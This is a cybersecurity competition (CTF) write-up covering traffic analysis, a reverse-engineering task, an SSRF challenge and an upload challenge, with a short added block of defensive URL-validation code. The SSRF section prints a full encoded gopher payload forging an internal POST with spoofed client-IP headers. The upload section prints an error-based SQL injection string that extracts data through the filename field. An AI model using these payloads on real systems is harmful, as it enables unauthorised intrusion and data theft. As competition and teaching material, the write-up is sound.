2nd Wangren Cup (网刃杯) Cybersecurity Competition

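The first two below are the sign-in (warm-up) challenges from the IEC and RE categories; I solved them, so I'm noting them down. The rest are web challenges.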

1.easyiec

Download the attachment, analyse the traffic, follow the TCP stream, and you get the flag!

2.freestyle

Noticed the hint! Look at the decompiled output.

Look at fun1 and fun2: basic arithmetic.

Finally, concatenating the two keys gives md5(3327104), which yields flag{31a364d51abd0c8304106c16779d83b1}

3.signin

Read /etc/hosts with the file protocol to get the internal IP.

SSRF: first build a payload to look for files, ?url=file:///proc/net/arp

This is not very readable, so capture the request in Burp and take a look!

172.73.23.100 and 172.73.23.1: try the gopher protocol against these two IPs.

gopher://172.73.23.100:80/_%50%4f%53%54%25%32%30%2f%25%33%46%61%25%33%44%31%25%32%30%48%54%54%50%2f%31%2e%31%25%30%44%25%30%41%48%6f%73%74%25%33%41%25%32%30%31%37%32%2e%37%33%2e%32%33%2e%31%30%30%25%33%41%38%30%25%30%44%25%30%41%58%2d%46%6f%72%77%61%72%64%65%64%2d%46%6f%72%25%33%41%25%32%30%31%32%37%2e%30%2e%30%2e%31%25%30%44%25%30%41%58%2d%4f%72%69%67%69%6e%61%74%69%6e%67%2d%49%50%25%33%41%25%32%30%31%32%37%2e%30%2e%30%2e%31%25%30%44%25%30%41%58%2d%52%65%6d%6f%74%65%2d%49%50%25%33%41%25%32%30%31%32%37%2e%30%2e%30%2e%31%25%30%44%25%30%41%58%2d%52%65%6d%6f%74%65%2d%41%64%64%72%25%33%41%25%32%30%31%32%37%2e%30%2e%30%2e%31%25%30%44%25%30%41%52%65%66%65%72%65%72%25%33%41%25%32%30%62%6f%6c%65%61%6e%2e%63%6c%75%62%25%30%44%25%30%41%43%6f%6e%74%65%6e%74%2d%4c%65%6e%67%74%68%25%33%41%25%32%30%33%25%30%44%25%30%41%43%6f%6e%74%65%6e%74%2d%54%79%70%65%25%33%41%25%32%30%61%70%70%6c%69%63%61%74%69%6f%6e%2f%78%2d%77%77%77%2d%66%6f%72%6d%2d%75%72%6c%65%6e%63%6f%64%65%64%25%30%44%25%30%41%25%30%44%25%30%41%62%25%33%44%31%25%30%44%25%30%41%25%30%44%25%30%41

Send it as a POST and get the flag!
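Seen from the defending side, the chain above works because the url parameter accepts file:// and gopher:// and can reach internal hosts. The following is an added example, not part of the original write-up, of a check a URL-fetching endpoint can apply; the allow-listed hostname, the /24 mask and the injected resolver are assumptions. Note that 172.73.23.100 lies outside RFC 1918, so a private-range test alone does not flag it.

```python
import ipaddress
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}          # file://, gopher://, dict:// etc. are refused
ALLOWED_HOSTS = {"images.example.com"}       # assumed egress allow-list (hypothetical host)
# Assumed site-specific internal range, taken from the two addresses in the write-up.
# 172.73.0.0/16 is outside RFC 1918 (172.16.0.0/12), so it must be listed explicitly.
INTERNAL_NETS = (ipaddress.ip_network("172.73.23.0/24"),)


def is_internal(addr, site_nets=INTERNAL_NETS):
    """True if addr must never be fetched on behalf of a user."""
    ip = ipaddress.ip_address(addr)
    if ip.version == 6 and ip.ipv4_mapped:   # ::ffff:a.b.c.d -> a.b.c.d
        ip = ip.ipv4_mapped
    return (ip.is_private or ip.is_loopback or ip.is_link_local
            or ip.is_reserved or ip.is_multicast or ip.is_unspecified
            or any(ip in net for net in site_nets))


def check_url(url, resolve):
    """Return (allowed, reason). resolve(host) -> list of IP strings (injected for testing)."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, "scheme"
    host = (parts.hostname or "").lower()
    if host not in ALLOWED_HOSTS:            # also rejects raw IP literals
        return False, "host"
    addrs = resolve(host)
    if not addrs:
        return False, "unresolved"
    if any(is_internal(a) for a in addrs):   # allow-listed name pointing inward
        return False, "internal-address"
    return True, "ok"


if __name__ == "__main__":
    dns = {"images.example.com": ["8.8.8.8"]}   # constructed resolver table
    for u in ("file:///proc/net/arp", "gopher://172.73.23.100:80/_x",
              "http://172.73.23.100/", "https://images.example.com/a.png"):
        print(u, check_url(u, lambda h: dns.get(h, [])))
```

The fetch itself has to connect to the address that was checked and re-run the check on every redirect; otherwise a second DNS answer or a 302 bypasses it.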

4.upload

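SQL injection inside an upload challenge. Upload anything and capture the request: a normal image uploads fine, and an image webshell uploads too, but it is not parsed, so it is useless. That means a different approach is needed. The challenge hint is sqlyyds, and at this point it also turns out that type is a controllable variable.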

Change type to ctf, then test whether filename has an injection vulnerability.

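After adding a character, an error appears. It is error-based injection, the standard kind, with nothing filtered, but the length is limited, so the flag has to be read in segments.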

' and updatexml(1,concat(0x7e,substr((select flag from flag ),1,30),0x7e),0x7e) and '

flag{5937a0b90b5966939cccd36921c68aa}

5.ez_js

Got it! That's all I know how to do. I'm too much of a beginner and couldn't solve the last challenge, so off to sleep! 💤